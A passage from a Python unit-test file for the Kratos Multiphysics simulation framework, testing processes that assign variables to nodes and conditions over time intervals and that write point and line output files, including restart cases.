self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) ############################################################ ##time = 3 - DISPLACEMENT_X is not in the 
active interval model_part.CloneTimeStep(6.0) for node in model_part.Nodes: self.assertFalse(node.IsFixed(DISPLACEMENT_X)) self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] for node in model_part.Nodes: self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), math.sqrt(node.X**2+node.Y**2)*3.0) ##still the old value self.assertEqual(node.GetSolutionStepValue(DENSITY), node.X**2+node.Y**2+node.Z**2+t) self.assertEqual(node.GetSolutionStepValue(VISCOSITY), node.X+100.0*node.Y*t**2) self.assertTrue(node.IsFixed(DENSITY)) self.assertTrue(node.IsFixed(VISCOSITY)) self.assertFalse(node.IsFixed(DISPLACEMENT_X)) #it is left unfixed at the end of the previous interval for process in list_of_processes: process.ExecuteFinalizeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] for node in model_part.Nodes: self.assertFalse(node.IsFixed(DENSITY)) self.assertFalse(node.IsFixed(VISCOSITY)) self.assertFalse(node.IsFixed(DISPLACEMENT_X)) ############################################################ ##time = 12 - DISPLACEMENT applied as a vector. x,z components fixed, y component not imposed ##time = 12 - VELOCITY applied as a vector by componentes. All components free. x component is not zero. model_part.CloneTimeStep(12.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] for node in model_part.Nodes: self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 10.0) self.assertTrue(node.IsFixed(DISPLACEMENT_X)) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Y), 0.0) #not applied!! 
self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Z), 12.0) self.assertTrue(node.IsFixed(DISPLACEMENT_Z)) self.assertEqual(node.GetSolutionStepValue(VELOCITY_X), 10.0) self.assertFalse(node.IsFixed(VELOCITY_X)) self.assertEqual(node.GetSolutionStepValue(VELOCITY_Y), 0.0) self.assertFalse(node.IsFixed(VELOCITY_Y)) self.assertEqual(node.GetSolutionStepValue(VELOCITY_Z), 0.0) self.assertFalse(node.IsFixed(VELOCITY_Z)) #print("**********************************************") for process in list_of_processes: process.ExecuteFinalizeSolutionStep() ############################################################ ##time >= 20 - DISPLACEMENT applied as a vector. x,z components fixed, y component not imposed ##time >= 20 - VELOCITY applied as a vector by componentes. All components free. y component is not zero. model_part.CloneTimeStep(20.1) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] #print("Checking time = ", t) for node in model_part.Nodes: self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 10.0) self.assertFalse(node.IsFixed(DISPLACEMENT_X)) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Y), 0.0) #not applied!! self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Z), t) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) self.assertEqual(node.GetSolutionStepValue(VELOCITY_X), 0.0) self.assertFalse(node.IsFixed(VELOCITY_X)) self.assertEqual(node.GetSolutionStepValue(VELOCITY_Y), math.sin(node.X*math.pi*t)) self.assertFalse(node.IsFixed(VELOCITY_Y)) self.assertEqual(node.GetSolutionStepValue(VELOCITY_Z), 0.0) self.assertFalse(node.IsFixed(VELOCITY_Z)) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() ############################################################ ##time >= 25 - DISPLACEMENT applied as a vector. 
x,z components fixed, y component not imposed ##time >= 25 - VELOCITY applied as a vector by componentes. All components fixed. y and z components are not zero. model_part.CloneTimeStep(26.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] #print("Checking time = ", t) for node in model_part.Nodes: self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 10.0) #previous value self.assertFalse(node.IsFixed(DISPLACEMENT_X)) #not fixed since set as null self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Y), node.X+node.Y*t) #not applied!! self.assertTrue(node.IsFixed(DISPLACEMENT_Y)) #set to true self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Z), t) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) self.assertEqual(node.GetSolutionStepValue(VELOCITY_X), 0.0) self.assertTrue(node.IsFixed(VELOCITY_X)) self.assertAlmostEqual(node.GetSolutionStepValue(VELOCITY_Y), (math.sqrt(abs(node.X*node.Y)))/math.sqrt(2)) self.assertTrue(node.IsFixed(VELOCITY_Y)) self.assertAlmostEqual(node.GetSolutionStepValue(VELOCITY_Z), (math.sqrt(abs(node.X*node.Y)))/math.sqrt(2)) self.assertTrue(node.IsFixed(VELOCITY_Z)) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() def test_rotated_system(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(VELOCITY) model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_model_part_io_read")) model_part_io.ReadModelPart(model_part) #note that y and z are inverted in the rotated system settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_scalar_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "VISCOSITY", "interval" : [0.0, 10.0], 
"constrained" : false, "value" : "x+100.0*y*t**2", "local_axes" :{ "origin" : [10.0, 0.0, 0.0], "axes" : [[1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, 1.0, 0.0] ] } } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) model_part.CloneTimeStep(3.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] for node in model_part.Nodes: x = node.X - 10.0 y = node.Z z = node.Y self.assertEqual(node.GetSolutionStepValue(VISCOSITY), x+100.0*y*t**2) self.assertFalse(node.IsFixed(VISCOSITY)) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() def test_assign_scalar_value_to_conditions(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_scalar_variable_to_conditions_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableToConditionsProcess", "Parameters" : { "model_part_name":"Main", "variable_name": "PRESSURE", "value" : 15.0 } }, { "python_module" : "assign_scalar_variable_to_conditions_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableToConditionsProcess", "Parameters" : { "model_part_name":"Main", "variable_name": "VISCOSITY", "value" : 2 } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) for process in list_of_processes: process.ExecuteInitializeSolutionStep() for cond in model_part.Conditions: self.assertEqual(cond.GetValue(PRESSURE), 15.0) self.assertEqual(cond.GetValue(VISCOSITY), 2) def test_assign_scalar_field_to_conditions(self): current_model = Model() model_part= 
current_model.CreateModelPart("Main") model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_scalar_variable_to_conditions_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableToConditionsProcess", "Parameters" : { "model_part_name":"Main", "variable_name": "INITIAL_STRAIN", "value" : "x+y*t+z" } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) model_part.CloneTimeStep(5.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() t = model_part.ProcessInfo[TIME] for cond in model_part.Conditions: v = cond.GetValue(INITIAL_STRAIN) i = 0 for node in cond.GetNodes(): self.assertEqual(v[i],node.X+node.Y*t+node.Z) i=i+1 def test_assign_scalar_field_scalar_variable_to_conditions(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_scalar_variable_to_conditions_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableToConditionsProcess", "Parameters" : { "model_part_name":"Main", "variable_name": "PRESSURE", "value" : "t" } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) model_part.CloneTimeStep(5.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() t = model_part.ProcessInfo[TIME] for cond in model_part.Conditions: v = cond.GetValue(PRESSURE) self.assertEqual(v,t) def test_assign_scalar_field_component_to_conditions(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part_io = 
ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_scalar_variable_to_conditions_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableToConditionsProcess", "Parameters" : { "model_part_name":"Main", "variable_name": "DISPLACEMENT_X", "value" : "t" } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) model_part.CloneTimeStep(5.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() t = model_part.ProcessInfo[TIME] for cond in model_part.Conditions: v = cond.GetValue(DISPLACEMENT) self.assertEqual(v[0],t) def test_find_nodal_h_process(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(NODAL_H) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) FindNodalHProcess(model_part).Execute(); for i in range(1,len(model_part.Nodes)): self.assertEqual(model_part.GetNode(i).GetSolutionStepValue(NODAL_H), 0.25) self.assertEqual(model_part.GetNode(len(model_part.Nodes)).GetSolutionStepValue(NODAL_H), 0.5) def test_assign_acceleration_to_nodes(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_time_derivative_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignTimeDerivativeProcess", "Parameters" : { "model_part_name":"Main", "variable_name" : "ACCELERATION", "variable_to_be_solved_for" : "DISPLACEMENT", "value" : 
["t",null,"z"], "interval" : [3.0,4.0] } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) ################### here we are within the interval model_part.CloneTimeStep(3.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() for node in model_part.Nodes: self.assertEqual(node.IsFixed(ACCELERATION_X), True) self.assertEqual(node.IsFixed(ACCELERATION_Y), False) self.assertEqual(node.IsFixed(ACCELERATION_Z), True) self.assertEqual(node.IsFixed(DISPLACEMENT_X), True) self.assertEqual(node.IsFixed(DISPLACEMENT_Y), False) self.assertEqual(node.IsFixed(DISPLACEMENT_Z), True) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_X), 3.0) #t = 3.0 self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Z), node.Z) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 0.0) #displacements remain unmodified, they will be assigned by the scheme self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Z), 0.0) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() for node in model_part.Nodes: self.assertEqual(node.IsFixed(ACCELERATION_X), False) self.assertEqual(node.IsFixed(ACCELERATION_Y), False) self.assertEqual(node.IsFixed(ACCELERATION_Z), False) self.assertEqual(node.IsFixed(DISPLACEMENT_X), False) self.assertEqual(node.IsFixed(DISPLACEMENT_Y), False) self.assertEqual(node.IsFixed(DISPLACEMENT_Z), False) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_X), 3.0) #t = 3.0 self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Z), node.Z) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 0.0) #displacements remain unmodified, they will be assigned by the scheme 
self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Z), 0.0) ################### here we are outside of the interval - values do not change but everything is free model_part.CloneTimeStep(8.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() for node in model_part.Nodes: self.assertEqual(node.IsFixed(ACCELERATION_X), False) self.assertEqual(node.IsFixed(ACCELERATION_Y), False) self.assertEqual(node.IsFixed(ACCELERATION_Z), False) self.assertEqual(node.IsFixed(DISPLACEMENT_X), False) self.assertEqual(node.IsFixed(DISPLACEMENT_Y), False) self.assertEqual(node.IsFixed(DISPLACEMENT_Z), False) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_X), 3.0) #t = 3.0 self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Z), node.Z) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 0.0) #displacements remain unmodified, they will be assigned by the scheme self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Z), 0.0) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() for node in model_part.Nodes: self.assertEqual(node.IsFixed(ACCELERATION_X), False) self.assertEqual(node.IsFixed(ACCELERATION_Y), False) self.assertEqual(node.IsFixed(ACCELERATION_Z), False) self.assertEqual(node.IsFixed(DISPLACEMENT_X), False) self.assertEqual(node.IsFixed(DISPLACEMENT_Y), False) self.assertEqual(node.IsFixed(DISPLACEMENT_Z), False) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_X), 3.0) #t = 3.0 self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Z), node.Z) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 0.0) #displacements remain unmodified, they will be assigned by the scheme self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Y), 0.0) 
self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Z), 0.0) def test_assign_vector_variable_to_conditions(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.CreateNewNode(1,0.5,0.5,0.5) model_part.CreateNewNode(2,1.0,1.0,1.0) model_part.CreateNewCondition("LineCondition2D2N",1,[1,2], model_part.GetProperties()[1]) settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_vector_by_direction_to_condition_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignVectorByDirectionToConditionProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DISPLACEMENT", "modulus" : "2.0*t-y", "direction" : [1.0,0.0,0.0], "interval" : [0.0,"End"] } } ] } """) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) ################### here we are within the interval model_part.CloneTimeStep(3.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() for cond in model_part.Conditions: tmp = cond.GetValue(DISPLACEMENT) self.assertEqual(tmp[0], 2.0*3.0-0.75) self.assertEqual(tmp[1], 0.0) self.assertEqual(tmp[2], 0.0) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() ################### here we are outside of the interval - values do not change but everything is free model_part.CloneTimeStep(8.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() for cond in model_part.Conditions: tmp = cond.GetValue(DISPLACEMENT) self.assertEqual(tmp[0], 2.0*8.0-0.75) self.assertEqual(tmp[1], 0.0) self.assertEqual(tmp[2], 0.0) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() def test_point_output_process_node(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) 
model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) reference_file_name = GetFilePath("point_output_process_ref_files/node_output_ref.dat") # Here we also test if the output to folder(s) (and subfolder(s)) works settings = Parameters("""{ "process_list" : [ { "python_module" : "point_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "PointOutputProcess", "Parameters" : { "position" : [0.5, 0.25, 0.0], "model_part_name" : "Main", "output_file_settings": { "file_name" : "node_output", "folder_name" : "test_parent_folder/test_subfolder" }, "output_variables" : ["DISPLACEMENT", "VISCOSITY", "ACCELERATION"], "entity_type" : "node" } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "test_parent_folder/test_subfolder/node_output.dat", "comparison_type" : "dat_file" } } ] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name) end_time = 5.0 delta_time = 0.15 model_part.ProcessInfo[TIME] = 0.0 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) kratos_utils.DeleteDirectoryIfExisting("test_parent_folder") def test_point_output_process_element(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) reference_file_name = GetFilePath("point_output_process_ref_files/element_output_ref.dat") settings = Parameters("""{ "process_list" : [ { "python_module" : "point_output_process", "kratos_module" : 
"KratosMultiphysics", "process_name" : "PointOutputProcess", "Parameters" : { "position" : [0.563, 0.89, 0.0], "model_part_name" : "Main", "output_file_settings": { "file_name" : "element_output" }, "output_variables" : ["DISPLACEMENT_X", "VISCOSITY", "ACCELERATION"] } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "element_output.dat", "comparison_type" : "dat_file" } } ] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name) end_time = 5.0 delta_time = 0.15 model_part.ProcessInfo[TIME] = 0.0 model_part.ProcessInfo[DOMAIN_SIZE] = 3 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) def test_point_output_process_condition(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_model_part_io_read")) model_part_io.ReadModelPart(model_part) reference_file_name = GetFilePath("point_output_process_ref_files/condition_output_ref.dat") # Here we also test if setting the write_buffer_size works settings = Parameters("""{ "process_list" : [ { "python_module" : "point_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "PointOutputProcess", "Parameters" : { "position" : [16.0, 0.2, 0.0], "model_part_name" : "Main", "output_file_settings": { "file_name" : "condition_output", "write_buffer_size" : 512 }, "output_variables" : ["DISPLACEMENT", "VISCOSITY", "ACCELERATION"], "entity_type" : "condition" } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", 
"output_file_name" : "condition_output.dat", "comparison_type" : "dat_file" } } ] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name) end_time = 5.0 delta_time = 0.15 model_part.ProcessInfo[TIME] = 0.0 model_part.ProcessInfo[DOMAIN_SIZE] = 2 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) def test_point_output_process_restart(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) reference_file_name = GetFilePath("point_output_process_ref_files/node_output_ref.dat") # note that we are comparing the same file as for without restart settings = Parameters("""{ "process_list" : [ { "python_module" : "point_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "PointOutputProcess", "Parameters" : { "position" : [0.5, 0.25, 0.0], "model_part_name" : "Main", "output_file_settings": { "file_name" : "point_output_rest" }, "output_variables" : ["DISPLACEMENT", "VISCOSITY", "ACCELERATION"], "entity_type" : "node" } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "point_output_rest.dat", "comparison_type" : "dat_file" } } ] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name) # From this file we copy some lines into a new file , which will be used as basis for the restart ref_file_name = settings["process_list"][1]["Parameters"]["reference_file_name"].GetString() ref_file_name = os.path.abspath(ref_file_name) # making it work independent of OS # here we create a dat file from a "previous run" 
out_file_name = settings["process_list"][0]["Parameters"]["output_file_settings"]["file_name"].GetString() out_file_name += ".dat" with open(ref_file_name, 'r') as ref_file, open(out_file_name, 'w') as out_file: for line in ref_file: out_file.write(line) if line.startswith("3.15"): # the previous run "stopped" at T=3.1 break model_part.ProcessInfo[IS_RESTARTED] = True model_part.ProcessInfo[TIME] = 2.1 # the new run "starts" at T=2.1 end_time = 5.0 delta_time = 0.15 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) def test_point_output_process_restart_with_restart_time_no_found(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) reference_file_name = GetFilePath("point_output_process_ref_files/node_output_restart_time_not_found_ref.dat") # note that we are comparing the same file as for without restart settings = Parameters("""{ "process_list" : [ { "python_module" : "point_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "PointOutputProcess", "Parameters" : { "position" : [0.5, 0.25, 0.0], "model_part_name" : "Main", "output_file_settings": { "file_name" : "point_output_restart_time_not_found" }, "output_variables" : ["DISPLACEMENT", "VISCOSITY", "ACCELERATION"], "entity_type" : "node" } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "point_output_restart_time_not_found.dat", "comparison_type" : "dat_file" } } ] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name) # From this file we copy some lines into a new file , 
which will be used as basis for the restart ref_file_name = settings["process_list"][1]["Parameters"]["reference_file_name"].GetString() ref_file_name = os.path.abspath(ref_file_name) # making it work independent of OS # here we create a dat file from a "previous run" out_file_name = settings["process_list"][0]["Parameters"]["output_file_settings"]["file_name"].GetString() out_file_name += ".dat" with open(ref_file_name, 'r') as ref_file, open(out_file_name, 'w') as out_file: for line in ref_file: out_file.write(line) if line.startswith("3.15"): # the previous run "stopped" at T=3.1 break model_part.ProcessInfo[IS_RESTARTED] = True model_part.ProcessInfo[TIME] = 2.15 # the new run "starts" at T=2.15, wich will not match any value end_time = 5.0 delta_time = 0.15 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) def test_point_output_process_failed_restart(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) # Delete the file in case it is leftover from a previous test kratos_utils.DeleteFileIfExisting("node_output_failed_restart.dat") reference_file_name = GetFilePath("point_output_process_ref_files/node_output_failed_restart_ref.dat") settings = Parameters("""{ "process_list" : [ { "python_module" : "point_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "PointOutputProcess", "Parameters" : { "position" : [0.5, 0.25, 0.0], "model_part_name" : "Main", "output_file_settings": { "file_name" : "node_output_failed_restart" }, "output_variables" : ["DISPLACEMENT", "VISCOSITY", "ACCELERATION"], "entity_type" : "node" } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : 
"CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "node_output_failed_restart.dat", "comparison_type" : "dat_file" } } ] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name) end_time = 5.0 delta_time = 0.15 # "fake" a restart model_part.ProcessInfo[IS_RESTARTED] = True model_part.ProcessInfo[TIME] = 2.1 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) def test_multiple_point_output_process(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) reference_file_name_1 = GetFilePath("point_output_process_ref_files/node_output_1_ref.dat") reference_file_name_2 = GetFilePath("point_output_process_ref_files/node_output_2_ref.dat") reference_file_name_3 = GetFilePath("point_output_process_ref_files/node_output_3_ref.dat") settings = Parameters("""{ "process_list" : [ { "python_module" : "multiple_points_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "MultiplePointsOutputProcess", "Parameters" : { "positions" : [[0.5, 0.0, 0.0], [0.25, 0.5, 0.0], [1.0, 0.0, 0.0]], "model_part_name" : "Main", "output_file_settings": { "file_name" : "node_output" }, "output_variables" : ["DISPLACEMENT", "VISCOSITY", "ACCELERATION"], "entity_type" : "node" } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "node_output_1.dat", "comparison_type" : "dat_file" } } ,{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", 
"Parameters" : { "reference_file_name" : "", "output_file_name" : "node_output_2.dat", "comparison_type" : "dat_file" } } ,{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "node_output_3.dat", "comparison_type" : "dat_file" } } ] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name_1) settings["process_list"][2]["Parameters"]["reference_file_name"].SetString(reference_file_name_2) settings["process_list"][3]["Parameters"]["reference_file_name"].SetString(reference_file_name_3) end_time = 5.0 delta_time = 0.15 model_part.ProcessInfo[TIME] = 0.0 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) def test_line_output_process(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) reference_file_name_1 = GetFilePath("point_output_process_ref_files/line_output_1_ref.dat") reference_file_name_2 = GetFilePath("point_output_process_ref_files/line_output_2_ref.dat") reference_file_name_3 = GetFilePath("point_output_process_ref_files/line_output_3_ref.dat") settings = Parameters("""{ "process_list" : [ { "python_module" : "line_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "LineOutputProcess", "Parameters" : { "start_point" : [0.0, 0.1, 0.0], "end_point" : [0.9, 0.5, 0.0], "model_part_name" : "Main", "output_file_settings": { "file_name" : "line_output" }, "output_variables" : ["DISPLACEMENT", "VISCOSITY", "ACCELERATION"] } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : 
